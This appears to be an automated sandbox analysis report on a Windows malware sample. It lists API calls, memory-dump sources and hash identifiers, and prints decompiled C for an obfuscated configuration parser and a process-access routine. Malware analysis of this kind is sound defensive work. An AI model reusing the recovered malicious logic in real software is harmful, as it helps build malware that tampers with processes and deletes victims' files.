Part of subcall function 00B01C11: memcpy.NTDLL(00000000,00000110,00000002,00000002,00B0553A,00000008,00B0553A,00B0553A,?,00B05805,00B0553A), ref: 00B01C47
Part of subcall function 00B01C11: memset.NTDLL ref: 00B01CBD
Part of subcall function 00B01C11: memset.NTDLL ref: 00B01CD1

memcpy.NTDLL(00000002,00B0553A,00000000,00000002,00B0553A,00B0553A,00B0553A,?,00B05805,00B0553A,?,00B0553A,00000002,?,?,00B053C9), ref: 00B0373C

Part of subcall function 00B04AAB: RtlFreeHeap.NTDLL(00000000,00000000,00B05012,00000000,?,?,00000000), ref: 00B04AB7

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: a398de8b3f78943e163395e258c0bc768799c7089f87579329b06be82864f276
Instruction ID: 3321e6e8b92c2c8f4e4658024b93b39fcfad6bc22be51b24f7239011dbd4b25e
Opcode Fuzzy Hash: a398de8b3f78943e163395e258c0bc768799c7089f87579329b06be82864f276
Instruction Fuzzy Hash: 8FE08CB250012876CB122A98DC41EEF7FACDF82B90F0440A0FF089A241E621DA60A7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00B60A77, Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B60A81

Part of subcall function 00B7092A: RegOpenKeyExA.KERNELBASE(00B60A99,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00B60A99,80000001,?,00B5B0CC), ref: 00B70971
Part of subcall function 00B7092A: RegOpenKeyExA.ADVAPI32(00B60A99,00B60A99,00000000,00020019,80000001,?,00B60A99,80000001,?,00B5B0CC), ref: 00B70987
Part of subcall function 00B7092A: RegCloseKey.ADVAPI32(80000001,80000001,?,00B5B0CC,00B5B0DC,?,00B60A99,80000001,?,00B5B0CC), ref: 00B709D0

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Open$Closememset
String ID:
API String ID: 1685373161-0
Opcode ID: 803b15b572664f3a9fb46e3b6f9288c4d7a4bd49e1c6bcf62efa5ef30df5e119
Instruction ID: 82230adcc31d741307c2bcc1e2046788a93d346f373ed223cd002936de8c979d
Opcode Fuzzy Hash: 803b15b572664f3a9fb46e3b6f9288c4d7a4bd49e1c6bcf62efa5ef30df5e119
Instruction Fuzzy Hash: 4CE0EC31250108BBEB00BA55D842F9A7794EB54354F00C055FE5C5A283DA71AA64D791

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B5BAF2, Relevance: 28.7, APIs: 19, Instructions: 234stringfilesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

Part of subcall function 00B5251A: ExpandEnvironmentStringsW.KERNEL32(00B6A43F,00000000,00000000,00000001,00000000,00000000,?,00B6A43F,00000000,?,?,00000000), ref: 00B52531
Part of subcall function 00B5251A: ExpandEnvironmentStringsW.KERNEL32(00B6A43F,00000000,00000000,00000000), ref: 00B5254B

lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 00B5BB3E
lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000006,?), ref: 00B5BB4A
memset.NTDLL ref: 00B5BB92
FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B5BBAD
lstrlenW.KERNEL32(0000002C), ref: 00B5BBE5
lstrlenW.KERNEL32(?), ref: 00B5BBED
memset.NTDLL ref: 00B5BC10
wcscpy.NTDLL ref: 00B5BC22
PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 00B5BC48
RtlEnterCriticalSection.NTDLL(?), ref: 00B5BC7E

Part of subcall function 00B70757: RtlFreeHeap.NTDLL(00000000,00000000,00B629D3,00000000), ref: 00B70763

RtlLeaveCriticalSection.NTDLL(?), ref: 00B5BC9A
FindNextFileW.KERNEL32(?,00000000), ref: 00B5BCB3
WaitForSingleObject.KERNEL32(00000000), ref: 00B5BCC5
FindClose.KERNEL32(?), ref: 00B5BCDA
FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B5BCEE
lstrlenW.KERNEL32(0000002C), ref: 00B5BD10
FindNextFileW.KERNEL32(?,00000000), ref: 00B5BD86
WaitForSingleObject.KERNEL32(00000000), ref: 00B5BD98
FindClose.KERNEL32(?), ref: 00B5BDB3

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
String ID:
API String ID: 2962561936-0
Opcode ID: 40043cce7d48883acd208c33575182af0a0d705cb52b66b69eb634a16a286c5d
Instruction ID: ac8f81a0f27b0ea6ed25e888bb7729b1092fb9a2dec0840d53d0d5dfa9070859
Opcode Fuzzy Hash: 40043cce7d48883acd208c33575182af0a0d705cb52b66b69eb634a16a286c5d
Instruction Fuzzy Hash: 2C816A71504305AFC760AF24DC85F1BBBE8EF88305F1049A9F999972A2DB74D849CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00B51C14, Relevance: 18.5, APIs: 12, Instructions: 517memoryCOMMON

Download Yara Rule

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51C4C
StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51C7E
StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51CB0
StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51CE2
StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51D14
StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51D46
StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51D78
StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51DAA
StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51DDC
HeapFree.KERNEL32(00000000,?,?,?,?), ref: 00B51F6F
StrToIntExA.SHLWAPI(00000000,00000000,?,?,?,?), ref: 00B52013

Part of subcall function 00B641A8: RtlEnterCriticalSection.NTDLL(0434C0A0), ref: 00B641B1
Part of subcall function 00B641A8: HeapFree.KERNEL32(00000000,?), ref: 00B641E3
Part of subcall function 00B641A8: RtlLeaveCriticalSection.NTDLL(0434C0A0), ref: 00B64201

HeapFree.KERNEL32(00000000,?,?,?,?), ref: 00B51FBB

Part of subcall function 00B51BC9: lstrlen.KERNEL32(?,00000000,74E06980,00000000,00B6C55F,?), ref: 00B51BD2
Part of subcall function 00B51BC9: memcpy.NTDLL(00000000,?,00000000,?), ref: 00B51BF5
Part of subcall function 00B51BC9: memset.NTDLL ref: 00B51C04

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: FreeHeap$CriticalSection$EnterLeavelstrlenmemcpymemset
String ID:
API String ID: 2064646876-0
Opcode ID: 536421d7203d905d8fdedb70a146886aa463f202850e4b780a23079a8d6f8920
Instruction ID: 6e1430da31268a475c2e01598d9dce5c9d35efa94c49f4790c43a07beddd6f18
Opcode Fuzzy Hash: 536421d7203d905d8fdedb70a146886aa463f202850e4b780a23079a8d6f8920
Instruction Fuzzy Hash: 39F16FB5A122169F9B11EBBC8CC5B6F32ECDB087427554DE1AD01E7260EB30DE4ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B6E9C2, Relevance: 16.6, APIs: 11, Instructions: 130libraryloadernativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,00000000,?,00B81354,00B767B8,00B81354,00000000,?,?,00B5B0CC), ref: 00B6E9F5
GetLastError.KERNEL32(?,00B81354,00B767B8,00B81354,00000000,?,?,00B5B0CC,?,?,?,?,?,?,?,00B577C7), ref: 00B6EA03
NtSetInformationProcess.NTDLL ref: 00B6EA5D
GetProcAddress.KERNEL32(?,00000000), ref: 00B6EA9C
GetProcAddress.KERNEL32(?), ref: 00B6EABD
TerminateThread.KERNEL32(?,00000000,00B5B0CC,00000004,00000000), ref: 00B6EB14
CloseHandle.KERNEL32(?), ref: 00B6EB2A
CloseHandle.KERNEL32(?), ref: 00B6EB50

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
String ID:
API String ID: 3529370251-0
Opcode ID: 26d774ed2e1a92dd020a42ba99140695bd3031350b5799cfc576ef63fb332f4d
Instruction ID: be34cf1c829cb53984c6bd0de19220f4339846141013acfd80eb8e30dba67a30
Opcode Fuzzy Hash: 26d774ed2e1a92dd020a42ba99140695bd3031350b5799cfc576ef63fb332f4d
Instruction Fuzzy Hash: 37417C75504345AFD710DF64CC88E6BBBE8FB88708F040969F56AA3160EB74CA49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00B52E19, Relevance: 16.6, APIs: 11, Instructions: 94memorystringsynchronizationCOMMON

Download Yara Rule

APIs

wcscpy.NTDLL ref: 00B52E4D
GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 00B52E59
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B52E6A
memset.NTDLL ref: 00B52E87
GetLogicalDriveStringsW.KERNEL32(?,?), ref: 00B52E95
WaitForSingleObject.KERNEL32(00000000), ref: 00B52EA3
GetDriveTypeW.KERNEL32(?), ref: 00B52EB1
lstrlenW.KERNEL32(?), ref: 00B52EBD
wcscpy.NTDLL ref: 00B52ECF
lstrlenW.KERNEL32(?), ref: 00B52EE9
HeapFree.KERNEL32(00000000,?), ref: 00B52F02

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
String ID:
API String ID: 3888849384-0
Opcode ID: ceb281f02baf5376b04defb5a659461006e0cd73823f82586cbdac5aa900f970
Instruction ID: d7a7aac3cad449aa92696bcf21ebca01493a7c2c008b901730b41b31cb0b8e4c
Opcode Fuzzy Hash: ceb281f02baf5376b04defb5a659461006e0cd73823f82586cbdac5aa900f970
Instruction Fuzzy Hash: 36311A7680110CBFDB01ABA4DC89DEEBBBDEB09315B1044A6F515E3121DB35AE899F60

Uniqueness

Uniqueness Score: -1.00%

Function 00B04C40, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00B04C40(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t121;

				_t104 = __ecx;
				_t28 =  *0xb0d2dc; // 0x69b25f44
				if(E00B05657( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0xb0d310 = _v8;
				}
				_t33 =  *0xb0d2dc; // 0x69b25f44
				if(E00B05657( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0xb0d2dc; // 0x69b25f44
				if(E00B05657( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0xb0d270, 0, _v16);
					goto L69;
				} else {
					_t103 = _v12;
					if(_t103 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0xb0d2dc; // 0x69b25f44
						_t45 = E00B03BB8(_t104, _t103, _t98 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0xb0d278 = _v8;
						}
					}
					if(_t103 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0xb0d2dc; // 0x69b25f44
						_t46 = E00B03BB8(_t104, _t103, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0xb0d27c = _v8;
						}
					}
					if(_t103 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0xb0d2dc; // 0x69b25f44
						_t47 = E00B03BB8(_t104, _t103, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0xb0d280 = _v8;
						}
					}
					if(_t103 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0xb0d2dc; // 0x69b25f44
						_t48 = E00B03BB8(_t104, _t103, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0xb0d004 = _v8;
						}
					}
					if(_t103 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0xb0d2dc; // 0x69b25f44
						_t49 = E00B03BB8(_t104, _t103, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0xb0d02c = _v8;
						}
					}
					if(_t103 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0xb0d2dc; // 0x69b25f44
						_t50 = E00B03BB8(_t104, _t103, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0xb0d284 = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t103 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0xb0d2dc; // 0x69b25f44
								_t51 = E00B03BB8(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E00B049B8(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E00B04B98();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0xb0d2dc; // 0x69b25f44
								_t52 = E00B03BB8(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E00B049B8(0, _t52) != 0) {
								_t121 =  *0xb0d364; // 0x18d95b0
								E00B09311(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0xb0d2dc; // 0x69b25f44
								_t53 = E00B03BB8(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0xb0d2e0; // 0xdca5a8
								_t22 = _t54 + 0xb0e252; // 0x616d692f
								 *0xb0d30c = _t22;
								goto L60;
							} else {
								_t64 = E00B049B8(0, _t53);
								 *0xb0d30c = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0xb0d2dc; // 0x69b25f44
										_t56 = E00B03BB8(_t104, _t103, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0xb0d2e0; // 0xdca5a8
										_t23 = _t57 + 0xb0e79a; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E00B049B8(0, _t56);
									}
									 *0xb0d380 = _t58;
									HeapFree( *0xb0d270, 0, _t103);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}

0x00b04c40
0x00b04c43
0x00b04c63
0x00b04c71
0x00b04c71
0x00b04c76
0x00b04c90
0x00b04ef8
0x00b04eff
0x00b04f06
0x00b04f06
0x00b04c96
0x00b04cb2
0x00b04ee6
0x00b04ef0
0x00000000
0x00b04cb8
0x00b04cb8
0x00b04cbd
0x00b04cd3
0x00b04cbf
0x00b04cbf
0x00b04ccc
0x00b04ccc
0x00b04cdd
0x00b04cdf
0x00b04ce9
0x00b04cee
0x00b04cee
0x00b04ce9
0x00b04cf5
0x00b04d0b
0x00b04cf7
0x00b04cf7
0x00b04d04
0x00b04d04
0x00b04d0f
0x00b04d11
0x00b04d1b
0x00b04d20
0x00b04d20
0x00b04d1b
0x00b04d27
0x00b04d3d
0x00b04d29
0x00b04d29
0x00b04d36
0x00b04d36
0x00b04d41
0x00b04d43
0x00b04d4d
0x00b04d52
0x00b04d52
0x00b04d4d
0x00b04d59
0x00b04d6f
0x00b04d5b
0x00b04d5b
0x00b04d68
0x00b04d68
0x00b04d73
0x00b04d75
0x00b04d7f
0x00b04d84
0x00b04d84
0x00b04d7f
0x00b04d8b
0x00b04da1
0x00b04d8d
0x00b04d8d
0x00b04d9a
0x00b04d9a
0x00b04da5
0x00b04da7
0x00b04db1
0x00b04db6
0x00b04db6
0x00b04db1
0x00b04dbd
0x00b04dd3
0x00b04dbf
0x00b04dbf
0x00b04dcc
0x00b04dcc
0x00b04dd7
0x00b04dea
0x00b04dea
0x00000000
0x00b04dd9
0x00b04dd9
0x00b04de3
0x00000000
0x00b04df4
0x00b04df4
0x00b04df6
0x00b04e0c
0x00b04df8
0x00b04df8
0x00b04e05
0x00b04e05
0x00b04e10
0x00b04e12
0x00b04e15
0x00b04e16
0x00b04e1d
0x00b04e1f
0x00b04e20
0x00b04e20
0x00b04e1d
0x00b04e27
0x00b04e3d
0x00b04e29
0x00b04e29
0x00b04e36
0x00b04e36
0x00b04e41
0x00b04e4f
0x00b04e59
0x00b04e59
0x00b04e60
0x00b04e76
0x00b04e62
0x00b04e62
0x00b04e6f
0x00b04e6f
0x00b04e7a
0x00b04e8d
0x00b04e8d
0x00b04e92
0x00b04e98
0x00000000
0x00b04e7c
0x00b04e7f
0x00b04e84
0x00b04e8b
0x00b04e9d
0x00b04e9f
0x00b04eb5
0x00b04ea1
0x00b04ea1
0x00b04eae
0x00b04eae
0x00b04eb9
0x00b04ec5
0x00b04eca
0x00b04eca
0x00b04ebb
0x00b04ebe
0x00b04ebe
0x00b04ed8
0x00b04edd
0x00b04ee3
0x00000000
0x00b04ee3
0x00000000
0x00b04e8b
0x00b04e7a
0x00b04de3
0x00b04dd7

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,00B05390,?,69B25F44,?,00B05390,69B25F44,?,00B05390,69B25F44,00000005,00B0D00C,00000008), ref: 00B04CE5
StrToIntExA.SHLWAPI(00000000,00000000,?,00B05390,?,69B25F44,?,00B05390,69B25F44,?,00B05390,69B25F44,00000005,00B0D00C,00000008), ref: 00B04D17
StrToIntExA.SHLWAPI(00000000,00000000,?,00B05390,?,69B25F44,?,00B05390,69B25F44,?,00B05390,69B25F44,00000005,00B0D00C,00000008), ref: 00B04D49
StrToIntExA.SHLWAPI(00000000,00000000,?,00B05390,?,69B25F44,?,00B05390,69B25F44,?,00B05390,69B25F44,00000005,00B0D00C,00000008), ref: 00B04D7B
StrToIntExA.SHLWAPI(00000000,00000000,?,00B05390,?,69B25F44,?,00B05390,69B25F44,?,00B05390,69B25F44,00000005,00B0D00C,00000008), ref: 00B04DAD
StrToIntExA.SHLWAPI(00000000,00000000,?,00B05390,?,69B25F44,?,00B05390,69B25F44,?,00B05390,69B25F44,00000005,00B0D00C,00000008), ref: 00B04DDF
HeapFree.KERNEL32(00000000,00B05390,00B05390,?,69B25F44,?,00B05390,69B25F44,?,00B05390,69B25F44,00000005,00B0D00C,00000008,?,00B05390), ref: 00B04EDD
HeapFree.KERNEL32(00000000,?,00B05390,?,69B25F44,?,00B05390,69B25F44,?,00B05390,69B25F44,00000005,00B0D00C,00000008,?,00B05390), ref: 00B04EF0

Part of subcall function 00B049B8: lstrlen.KERNEL32(69B25F44,00000000,7673D3B0,00B05390,00B04EC3,00000000,00B05390,?,69B25F44,?,00B05390,69B25F44,?,00B05390,69B25F44,00000005), ref: 00B049C1
Part of subcall function 00B049B8: memcpy.NTDLL(00000000,?,00000000,00000001,?,00B05390), ref: 00B049E4
Part of subcall function 00B049B8: memset.NTDLL ref: 00B049F3

Strings

Ut, xrefs: 00B04EDD, 00B04EF0

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$lstrlenmemcpymemset
String ID: Ut
API String ID: 3442150357-8415677
Opcode ID: 35032ff1037a6f99a02f05b5851e51642f8cc53b32d3e42bd162a030a57d6e6b
Instruction ID: 543df7bba6d4af06a3be7cb2c372d73ef407073fece4997f4b0983d0ecdf804f
Opcode Fuzzy Hash: 35032ff1037a6f99a02f05b5851e51642f8cc53b32d3e42bd162a030a57d6e6b
Instruction Fuzzy Hash: D48151F0A00244AECB20EBB4DE88D5B7FEDEB58700B244AE5A601D71D4EF75DE449B60

Uniqueness

Uniqueness Score: -1.00%

Function 00B66467, Relevance: 12.1, APIs: 8, Instructions: 111stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B6CB9E: ExpandEnvironmentStringsW.KERNEL32(74B606E0,00000000,00000000,74B606E0,?,80000001,00B5A627,?,80000001,?), ref: 00B6CBAF
Part of subcall function 00B6CB9E: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 00B6CBCC

FreeLibrary.KERNEL32(?), ref: 00B6659D

Part of subcall function 00B58BDD: lstrlenW.KERNEL32(?,00000000,?,?,?,00B664E2,?,?), ref: 00B58BEA
Part of subcall function 00B58BDD: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,00B664E2,?,?), ref: 00B58C13
Part of subcall function 00B58BDD: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 00B58C33
Part of subcall function 00B58BDD: lstrcpyW.KERNEL32(-00000002,?), ref: 00B58C4F
Part of subcall function 00B58BDD: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00B664E2,?,?), ref: 00B58C5B
Part of subcall function 00B58BDD: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,00B664E2,?,?), ref: 00B58C5E
Part of subcall function 00B58BDD: SetCurrentDirectoryW.KERNEL32(74E068C0,?,?,?,00B664E2,?,?), ref: 00B58C6A
Part of subcall function 00B58BDD: GetProcAddress.KERNEL32(00000000,?), ref: 00B58C87
Part of subcall function 00B58BDD: GetProcAddress.KERNEL32(00000000,?), ref: 00B58CA1
Part of subcall function 00B58BDD: GetProcAddress.KERNEL32(00000000,?), ref: 00B58CB7
Part of subcall function 00B58BDD: GetProcAddress.KERNEL32(00000000,?), ref: 00B58CCD
Part of subcall function 00B58BDD: GetProcAddress.KERNEL32(00000000,?), ref: 00B58CE3
Part of subcall function 00B58BDD: GetProcAddress.KERNEL32(00000000,?), ref: 00B58CF9

FindFirstFileW.KERNEL32(?,?,?,?), ref: 00B664F3
lstrlenW.KERNEL32(?), ref: 00B6650F
lstrlenW.KERNEL32(?), ref: 00B66527

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

lstrcpyW.KERNEL32(00000000,?), ref: 00B66540
lstrcpyW.KERNEL32(00000002), ref: 00B66555

Part of subcall function 00B533DF: lstrlenW.KERNEL32(?), ref: 00B533EF
Part of subcall function 00B533DF: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001), ref: 00B53411
Part of subcall function 00B533DF: lstrcpyW.KERNEL32(00000000,?), ref: 00B5343D
Part of subcall function 00B533DF: lstrcatW.KERNEL32(00000000,?), ref: 00B53450

FindNextFileW.KERNEL32(?,00000010), ref: 00B6657D
FindClose.KERNEL32(00000002), ref: 00B6658B

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
String ID:
API String ID: 1209511739-0
Opcode ID: 3b15b3f42dd3055d8a7d17f04e50d7241a8772cf67ff4f990181e2d0ce5c93a1
Instruction ID: 978715aa4c7fd467b787732a0f40e7b98b420dbdfa1398da762d8d7518c114de
Opcode Fuzzy Hash: 3b15b3f42dd3055d8a7d17f04e50d7241a8772cf67ff4f990181e2d0ce5c93a1
Instruction Fuzzy Hash: 05415D714043499FC711EF60DC49A6FBBE8FB88B05F040D69F999A2164DB34DA09CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00B6B4A5, Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000), ref: 00B6B4BD

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 00B6B526
lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 00B6B54E
RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 00B6B5A0
DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 00B6B5AB
FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 00B6B5BE

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
String ID:
API String ID: 499515686-0
Opcode ID: 2f73a209bfd9ff15fbd26a6419bf00c48b0d38f7ef67065db48241b58d14841e
Instruction ID: 56eba0478a4b23a54fc0e1c9ac2a582e5269165a94eb98f6f1405278741de45b
Opcode Fuzzy Hash: 2f73a209bfd9ff15fbd26a6419bf00c48b0d38f7ef67065db48241b58d14841e
Instruction Fuzzy Hash: 7641187190020AEBDF11AFA0DC55EEE7BF8EF10305F2080A5E916E6161DB759B84DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B56F3E, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B56F60

Part of subcall function 00B7186D: RtlNtStatusToDosError.NTDLL(00000000), ref: 00B718A5
Part of subcall function 00B7186D: SetLastError.KERNEL32(00000000), ref: 00B718AC

GetLastError.KERNEL32(?,00000318,00000008), ref: 00B57070

Part of subcall function 00B662DC: RtlNtStatusToDosError.NTDLL(00000000), ref: 00B662F4

memcpy.NTDLL(00000218,00B79D50,00000100,?,00010003,?,?,00000318,00000008), ref: 00B56FEF
RtlNtStatusToDosError.NTDLL(00000000), ref: 00B57049

Strings

, xrefs: 00B56FB6

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Error$Status$Last$memcpymemset
String ID:
API String ID: 945571674-3916222277
Opcode ID: 554688e77680e239ba22cc9ab0f77eea984f1733720f946f6146574a2f59f8aa
Instruction ID: 2115a6b1919847957e6ee98bb620d1ad4cb3083b93690b66d207cf66fa356787
Opcode Fuzzy Hash: 554688e77680e239ba22cc9ab0f77eea984f1733720f946f6146574a2f59f8aa
Instruction Fuzzy Hash: DD318671A413099FDB20DF54D985BAEB7F8EB04305F1445EAE955E7290EB30EE48CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1825, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1A1825() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x6e1a41b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6e1a41bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x6e1a41ac = _t3;
						_t5 = GetCurrentProcessId();
						 *0x6e1a41a8 = _t5;
						 *0x6e1a41b0 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x6e1a41a4 = _t6;
						if(_t6 == 0) {
							 *0x6e1a41a4 =  *0x6e1a41a4 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x6e1a1826
0x6e1a1834
0x6e1a183a
0x6e1a1841
0x6e1a1898
0x6e1a1898
0x6e1a1843
0x6e1a184b
0x6e1a1858
